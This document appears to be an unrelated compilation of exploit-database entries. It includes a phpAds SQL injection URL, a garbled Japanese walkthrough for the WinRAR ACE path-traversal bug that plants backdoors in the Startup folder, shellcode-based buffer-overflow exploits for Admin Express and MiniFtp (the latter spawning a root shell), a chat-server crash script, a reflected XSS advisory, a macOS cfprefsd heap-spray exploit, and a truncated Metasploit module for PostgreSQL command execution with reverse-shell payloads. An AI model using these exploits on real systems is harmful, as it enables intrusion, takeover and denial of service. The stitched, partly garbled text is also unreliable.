http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF
0x01脆弱性の説明
最近、チェックポイントチームは19年間存在してきたWinrarについての脆弱性を発揮し、それを使用して被害者のコンピューターの制御を得ることができます。攻撃者は、この脆弱性を使用して悪意のある圧縮ファイルを構築する必要があります。これは、被害者がWinrarを使用して悪意のあるファイルを解凍するときにトリガーされます。
脆弱性は、2006年に基本的な保護メカニズム(ASLR、DEPなど)なしでコンパイルされたWinrarが使用した古い動的な動的リンクライブラリUNACEV2.DLLによって引き起こされます。動的リンクライブラリの目的は、ACE形式ファイルを処理することです。 WinrarがACEファイルを解凍すると、ファイル名が十分にフィルタリングされていないため、ディレクトリのトラバーサルを実現し、悪意のあるファイルを任意のディレクトリに書き込み、起動項目にファイルを書き込み、コード実行になります。
0x02脆弱性の影響
インパクトソフトウェア:
Winrar 5.70ベータ1
Bandizip=6.2.0.0
良好な圧力(2345圧縮)=5.9.8.10907
360圧縮=4.0.0.1170
0x03脆弱性ハザード
1。この脆弱性を通じて、ハッカーは悪意のあるプログラムをユーザースタートアップアイテムに入れて、ターゲットコンピューターが再起動するときにターゲットホストにアクセス許可を取得できます。
2。システムの許可を得て入れることができます
c:/windows/system32/wbem/mof/nullevt.mofは、ターゲットホストの許可を直接取得します。
3. DLLハイジャック用の悪意のあるDLLファイルを配置して、ターゲットホストにアクセス許可を取得するか、ユーザーホストなどにファイルを上書きしてターゲットホストへのアクセス許可を取得できます。
0x04脆弱性の詳細
の脆弱性は、主に、WinrarがACE圧縮パッケージを解凍するために使用される動的リンクライブラリUNACEV2.DLLによって引き起こされます。 unacev2.dllでファイル名を処理する場合、CRCのみが検証されます。ハッカーは、圧縮パッケージのCRC検証コードを変更して、減圧中にファイル名を変更して、このパストラバーサルの脆弱性をトリガーすることができます。ただし、Winrar自体はファイル名を検出し、いくつかの制限があります。通常のユーザーがRARファイルを解凍した場合、システム権限を必要とするフォルダーに悪意のあるペイロードを解凍することはできません。ユーザーがファイルをデフォルトのc: \ users \ administator \ downloadsディレクトリにダウンロードすると、構築します
c: \ c:c:/appdata \ roaming \ microsoft \ windows \ startmenu \ programs \ startup \ test.exe
WinrarのCleanPath関数処理の後になります
c:/appdata \ roaming \ microsoft \ windows \ startmenu \ programs \ startup \ test.exe
その中で、C:は現在のパスに変換されます。 Winrarで開くと、現在のパスはC: \ Program Files \ Winrarです。右クリックしてフォルダー内のxxx \に減圧すると、現在のパスは圧縮パッケージが配置されているパスです。
ユーザーが右クリックしてフォルダー内のXXに減圧すると、悪意のあるペイロード減圧アドレスが
c: \ uses \ administrator \ downloads ./appdata \ roaming \ microsoft \ windows \ startmenu \ programs \ startup \ test.exe
現在のユーザーのスタートアイテムです。このような使用率は、1つのパストラバーサルから任意のコマンド実行までプロセスを完了します。
0x05脆弱性の再発
この脆弱性の実装プロセス:最初に新しいファイルを作成し(またはバックドアエグジファイルを指定できます)、Winaceを使用してそれを圧縮し、ファイル名を変更してディレクトリトラバーサルの脆弱性を実装し、ファイルを任意のディレクトリに減圧します。
Winaceと010Editorの主な必要なツールは次のとおりです。
http://D3GKUJ25U7YVFK.CLOUDFRONT.NET/97M4@S345U2A5/INSTALLER_WINACE_2.69.EXE
https://download.sweetscape.com/010editorwin64installer901.exe
1。Winaceをダウンロードしてインストールします。インストールが完了したら、arbitrary.txtの名前を記載した新しいテキストファイルをここに作成します。
2。 Winaceを使用して圧縮するには、こちらからフルパスを保存します。
3.スクリプトを介してRARのヘッダー情報を確認すると、スクリプトのダウンロードアドレスは次のとおりです。
https://raw.githubusercontent.com/backlion/acefile/master/acefile.py
python acefile.py - Headers Backlion.ace
次のパラメーターに注意する必要があります。
HDR_CRCHDR_SIZEFILENAME LENGTH FILENAME
4.私たちはそれを変更し始め、スタートアップアイテムに配置します
c: \ programdata \ microsoft \ windows \ start menu \ programs \ backlion.txt。ここの変更は次のとおりです。
5.ファイルの場所を選択すると、ファイルの長さが65であることがわかります(小数点以下、ここで16進変換する必要があります)
長さは65(小数)-0x41です
6。その変更の長さの位置:00 41(変更順序は背面から前後です)
次に、hdr_sizeの値を変更します。ここで次の位置を選択してください。その長さは96であることがわかります(10進、16進数に変換する必要があります)。
の長さは96(小数)-0x0060です
変更された場所は次のとおりです。
7。その後、この時点でAceFile.pyを使用してACEファイルを解析すると、エラーを作成できます/
d: \ python3python acefile.py - headers backlion.ace
[+] Right_hdr_crc :0xcda5 | struct b '\ xa5 \ xcd'
[*] current_hdr_crc :0xed55 | struct b'u \ xed '
backlion.ace: correstededarchiveerror:ヘッダーCRCが失敗しました
8。正しいCRC値が0xCDA5であることがわかります。したがって、次の変更を行います。
9。再分析され、成功を見つけました
10. backlion.rceファイルを解凍し、スタートアップエントリの下でbacklion.txtファイルとしてファイルをリリースします。
スクリプトオートメーション利用:
また、カスタムスクリプトの実行を添付します。
https://github.com/backlion/cve-2018-20250
その中の:CALC.EXEは、Trojanファイルに置き換えることができます。テストのために、私はそれを計算機に置き換えます、そして、world.txtとhello.txtはあなたが圧縮する必要があるファイルです。
exp.pyスクリプトを実行した後、test.rarファイルが自動的に生成されます。
Test.rarファイルを開き、現在のユーザーの起動オプションの下でバックドアファイルhh.exeを作成するには、被害者が必要です。
c: \ users \これは現在のコンピューターで使用されるユーザー名\ appdata \ roaming \ microsoft \ windows \ start menu \ programs \
c: \ users \ xxx \ appdata \ roaming \ microsoft \ windows \ start menu \ programs \ startup
0x06修理提案
2つの方法があります
最新バージョンへのアップグレード、Winrarは現在5.70ベータ1です
インストールディレクトリでunacev2.dllファイルを削除します
0x07参照
https://Research.checkpoint.com/extracting-code-execution-from-winrar/
https://fuping.site/2019/02/21/winrar-extracting-code-execution-validate/
https://mp.weixin.qqc.com/s/j8g9tjq2npg0cfhxl_sqgq
https://github.com/ridter/acefile
wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'
# Title: Admin Express v1.2.5.485 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: May 6th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Vendor Homepage: https://admin-express.en.softonic.com/
# Software Link: https://admin-express.en.softonic.com/download
# Version v1.2.5.485
# Tested on: Windows XP SP3 EN
# TO RUN:
# 1. Run python script
# 2. Copy contents of pwn.txt
# 3. Open Admin Express
# 4. Select System Compare
# 5. Paste contents into the left-hand side Folder Path field
# 6. Click the scale icon in the middle of the screen, under the Services and Running Processes tabs
# This got a bit hairy. We manually encoded our shellcode and had to use the sub method for encoding each line of payload.
# 05 was a bad character for us, which is an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
# Can replace with a shell, if you are willing to do the encoding and decoding math Too preoccupied for now, so here is calc.exe
# You would need to use logical AND plus the sub eax opcodes to get a value on the stack that could jump back to the A buffer, where there is
# much more room. Then you would need to align the stack with the stack pointer value you need (not 0x012F3F4 as used below) and write to the stack upwards.
# You should have enough room for all of the logical AND plus sub eax commands to get a full-sized shell payload on the stack.
# calc.exe shellcode:
# "\x31\xc9\x51\x68"
# "\x63\x61\x6c\x63"
# "\x54\xB8\xc7\x93"
# "\xc2\x77\xff\xd0"
# For zeroing out registers before manual shellcode
zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101
zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010
# We need to save the current stack pointer before execution of shellcode, due to
# old stack pointer value needed when executing our payload of calc.exe. This puts the current stack pointer 0x0012DC98 into ECX, to be used later
restore = "\x54" # push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
restore += "\x59" # pop ecx; (holding the value of old ESP in ECX, to be called later.)
restore += "\x51" # push ecx; (to get the value on the stack for the mov esp command later)
# Stack alignment
# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
alignment = "\x54" # push esp
alignment += "\x58" # pop eax; (puts the value of ESP into EAX)
# Write these 3 sub values in normal format, since memory address, not instruction to be executed. You do not have to do
# it this way, but I do my calculations in normal format to remind me it is a memory address, when doing hex max. For my
# other operations, I used little endian. If you do all of the calculations in one way, you do not need to flip the sub
# math difference results. This is how I keep things straight
# 384D5555 364D5555 364E5555
alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555
alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555
alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp; (puts the value of eax back into esp)
# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
# 1st line = 2C552D14 01552D14 01562E16
shellcode = zero
shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14
shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14
shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16
shellcode += "\x50" # push eax; (get the value on the stack). We will do this for all remaining steps like this one.
# 2nd line = 24121729 24121739 2414194A
shellcode += zero
shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729
shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739
shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
shellcode += "\x50" # push eax
# 3rd line = 34313635 34313434 34313434
shellcode += zero
shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635
shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434
shellcode += "\x50" # push eax
# 4th line = 323A1245 323A1245 333A1245
shellcode += zero
shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245
shellcode += "\x50" # push eax
# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
# we need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!).
# Here are the 3 values: 403F2711 3F3F2711 3F3F2811
move = zero
move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711
move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711
move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811
move += "\x50" # push eax
# All together now.
payload = "\x41" * 4260
payload += "\x70\x7e\x71\x7e" # JO 126 bytes. If jump fails, default to JNO 126 bytes
payload += "\x42\x4c\x01\x10" # 0x10014c42 pop pop ret wmiwrap.DLL
# There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
# so we have enough room for our shellcode and to decode.
payload += "\x41" * 122 # add padding since we jumped 7e hex bytes (126 bytes) above
payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
payload += "\x41" * 124
payload += "\x70\x7e\x71\x7e" # JO or JNO another 126 bytes, so shellcode can decode
payload += "\x41" * 124
payload += "\x70\x79\x71\x79" # JO or JNO only 121 bytes
payload += "\x41" * 121 # NOP is in the restricted characters. Using \x41 as a slide into alignment
payload += restore
payload += alignment
payload += shellcode
payload += move
payload += "\x43" * (5000-len(payload))
f = open('pwn.txt', 'w')
f.write(payload)
f.close()
#!/usr/bin/python
#---------------------------------------------------------
# Title: Easy Chat Server Version 3.1 - (DOS)
# Date: 2019-05-07
# Author: Miguel Mendez Z
# Team: www.exploiting.cl
# Vendor: http://www.echatserver.com
# Software Link: http://www.echatserver.com/ecssetup.exe
# Platforms: Windows
# Version: 3.1
# Tested on: Windows Windows 7_x86/7_x64 [eng]
#---------------------------------------------------------
#
# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2.
# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion.
import os, sys, socket
from time import sleep
ip = '127.0.0.1'
padding = 'A' * 8000
GET = (
"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: "+str(ip)+":80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://"+str(ip)+"\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
try:
print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET))
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((ip, 80))
s1.send(GET)
s1.recv(1024)
s1.close()
except:
print "Sin conexion GET"
sleep(3)
POST = (
"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n"
"Host: "+str(ip)+"\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: es-CL,en-US;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message="+str(padding)+"&chat_flag="
)
try:
print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST))
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((ip, 80))
s2.send(POST)
s2.recv(1024)
s2.close()
except:
print "Sin conexion POST"
Details
================
Software: Prinect Archive System
Version: v2015 Release 2.6
Homepage: https://www.heidelberg.com
Advisory report: https://github.com/alt3kx/CVE-2019-10685
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79
Description
================
A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
Vulnerability
================
The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.
Proof of concept
================
Reflected XSS
Payload: %3cscript%3ealert(1)%3c%2fscript%3e
The offending GET request is:
GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
Host: victim_IP:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F
Reflected XSS Reponse:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 04 Feb 2019 13:15:12 GMT
Connection: close
[../snip]
id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>
# curl -i -s -k -X GET
-H "Host: victim:8090"
-H "Accept-Encoding: gzip, deflate"
-H "Accept: */*"
-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8"
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
-H "Connection: close"
-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F"
"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2"
--proxy http://127.0.0.1:8080
Final payload into URL:
http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
Mitigations
================
No more feedback from the vendor:
https://www.heidelberg.com
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2019-02-04: Discovered
2019-02-25: Retest PRO environment
2019-03-25: Retest on researcher's ecosystem
2019-04-02: Vendor notification
2019-04-03: Vendor feedback received
2019-04-08: Reminder sent
2019-04-08: 2nd reminder sent
2019-04-11: Internal communication
2019-04-26: No more feedback received from the vendor
2019-05-30: New issues found
2019-06-30: Public Disclosure
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db:
https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended only for educational and defensive purposes only.
// Use at your own risk.
#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>
#define AGENT 1
#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)
int need_stop = 0;
struct heap_spray {
void* fake_objc_class_ptr;
uint32_t r10;
uint32_t r4;
void* fake_sel_addr;
uint32_t r5;
uint32_t r6;
uint64_t cmd;
uint8_t pad1[0x3c];
uint32_t stack_pivot;
struct fake_objc_class_t {
char pad[0x8];
void* cache_buckets_ptr;
uint32_t cache_bucket_mask;
} fake_objc_class;
struct fake_cache_bucket_t {
void* cached_sel;
void* cached_function;
} fake_cache_bucket;
char command[32];
};
void fill_once(){
#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
//printf("received an event\n");
});
xpc_connection_resume(client);
xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");
char key[100];
char value[FILL_SIZE];
memset(value, "A", FILL_SIZE);
*((uint64_t *)value) = 0x4142010180202020;
//*((uint64_t *)value) = 0x180202020;
value[FILL_SIZE-1]=0;
for (int i=0; i<FILL_DICT_COUNT; i++) {
sprintf(key, "%d",i);
xpc_dictionary_set_string(spray_dict, key, value);
}
//NSLog(@"%@", spray_dict);
for (uint64_t i=0; i<FILL_COUNT; i++) {
xpc_array_append_value(arr, spray_dict);
}
xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);
void* heap_spray_target_addr = (void*)0x180202000;
struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(map, 0, 0x1000);
struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
//hs->null0 = 0;
hs->cmd = -1;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
// nasty hack to find the correct selector address
hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");
hs->fake_cache_bucket.cached_function = 0xdeadbeef;
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
}
xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);
//NSLog(@"%@", main_dict);
xpc_connection_send_message(client, main_dict);
printf("fill once\n");
xpc_release(main_dict);
}
void trigger_vul(){
#if AGENT
printf("AGENT\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
printf("DAEMON\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
});
xpc_connection_resume(conn);
xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
xpc_array_append_value(arr, arr_free);
for (int i=0; i<FREE_COUNT; i++) {
xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
xpc_array_append_value(arr, arr_elem1);
}
//printf("%p, %p\n", arr_elem1, hello);
xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);
//NSLog (@"%@", hello);
fill_once();
xpc_connection_send_message(conn, hello);
NSLog(@" trigger vuln");
xpc_release(hello);
}
int main(int argc, const char * argv[]) {
pthread_t fillthread1,triger_thread;
NSLog(@"start to trigger..");
trigger_vul();
return 0;
}
# Exploit Title: MiniFtp parseconf_load_setting local-bufferoverflow (318 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: https://github.com/skyqinsc/MiniFtp
# Software Link: https://github.com/skyqinsc/MiniFtp
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 318
------------------------------[Description]---------------------------------
This exploit spawns a shell with root privileges. The exploit will be written into the file miniftpd.conf
vuln code:
void parseconf_load_setting(const char *setting){
while(isspace(*setting)) setting++;
char key[128] = {0}, value[128] = {0};
str_split(setting, key, value, '=');
if(strlen(value) == 0){
fprintf(stderr, "missing value in config file for : %s\n", key);
exit(EXIT_FAILURE);
}
....
The given var settings is a *char and will be splitted into key and value key and value are both 128 char long and settings can be longer than 128 + 128 chars. this issue will not be checked and stored. This causes a buffer overflow.
after return it
-----------------------------[Gdb-Peda Dump]---------------------------------
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x48575250e7894851
RCX: 0xffffffd480050f3b
RDX: 0x90
RSI: 0x7fffffffd3a0 --> 0x9090909090909090
RDI: 0x55555555c854 ("download_max_rate")
RBP: 0x50f3bc08348e689
RSP: 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
RIP: 0x7fffffffd481 --> 0x9090909090909090
R8 : 0xa ('\n')
R9 : 0x7fffffffd4a0 --> 0x9090909090909090
R10: 0x83a
R11: 0x7ffff7891520 (<__strcmp_sse2_unaligned>: mov eax,edi)
R12: 0x555555556860 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe200 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fffffffd478: imul esi,DWORD PTR [rax+0x3d],0x90909090
0x7fffffffd47f: nop
0x7fffffffd480: nop
=> 0x7fffffffd481: nop
0x7fffffffd482: nop
0x7fffffffd483: nop
0x7fffffffd484: nop
0x7fffffffd485: nop
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
0008| 0x7fffffffd468 --> 0x55555555b5b2 ("miniftpd.conf")
0016| 0x7fffffffd470 ("max_per_ip=", '\220' <repeats 189 times>...)
0024| 0x7fffffffd478 --> 0x90909090903d7069
0032| 0x7fffffffd480 --> 0x9090909090909090
0040| 0x7fffffffd488 --> 0x9090909090909090
0048| 0x7fffffffd490 --> 0x9090909090909090
0056| 0x7fffffffd498 --> 0x9090909090909090
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007fffffffd481 in ?? ()
gdb-peda$
-----------------------------[Exploit]---------------------------------------------
python -c "print 'max_per_ip=' + '\x90' * 278 + '\x48\x31\xc0\x48\x31\xd2\x50\x49\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x51\x48\x89\xe7\x50\x52\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05' + '\x80\xd4\xff\xff\xff\x7f'" > miniftpd.conf
-----------------------------[how to run]-----------------------------
run the line above in a shell
run MiniFtp in gdb and you got a shell
\##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/postgres'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Postgres
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
'Description' => %q(
Installations running Postgres 9.3 and above have functionality which allows for the superuser
and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
This allows arbitrary command execution as though you have console access.
This module attempts to create a new table, then execute system commands in the context of
copying the command output into the table.
This module should work on all Postgres systems running version 9.3 and above.
For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl
For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
or other customised command.
),
'Author' => [
'Jacob Wilkin' # Exploit Author of Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2019-9193'],
['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
],
'PayloadType' => 'cmd',
'Platform' => %w(linux unix win osx),
'Payload' => {
},
'Arch' => [ARCH_CMD],
'Targets' =>
[
[
'Unix/OSX/Linux', {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'Payload' => 'cmd/unix/reverse_perl' }
}
],[
'Windows - PowerShell (In-Memory)', {
'Platform' => 'windows',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'Payload' => 'cmd/windows/powershell_reverse_tcp' }
}
],[
'Windows (CMD)',
'Platform' => 'win',
'Arch' => [ARCH_CMD],
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'adduser, generic'
}
}
],
],
'DisclosureDate' => 'Mar 20 2019'
))
register_options([
Opt::RPORT(5432),
OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
])
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
end
# Return the datastore value of the same name
# @return [String] tablename for table to use with command execution
def tablename
datastore['TABLENAME']
end
def check
vuln_version? ? CheckCode::Appears : CheckCode::Safe
end
def vuln_version?
version = postgres_fingerprint
return false unless version[:auth]
vprint_status version[:auth].to_s
version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
return true
else
return false
end
end
def login_success?
status = do_login(username, password, database)
case status
when :noauth
print_error "#{peer} - Authentication failed"
return false
when :noconn
print_error "#{peer} - Connection failed"
return false
else
print_status "#{peer} - #{status}"
return true
end
end
def execute_payload
# Drop table if it exists
query = "DROP TABLE IF EXISTS #{tablename};"
drop_query = postgres_query(query)
case drop_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} dropped successfully"
else
print_error "#{peer} - Unknown"
return false
end
# Create Table
query = "CREATE TABLE #{tablename}(filename text);"
create_query = postgres_query(query)
case create_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} created successfully"
else
print_error "#{peer} - Unknown"
return false
end
# Copy Command into Table
cmd_filtered = payload.encoded.gsub("'", "''")
query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
copy_query = postgres_query(query)
case copy_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
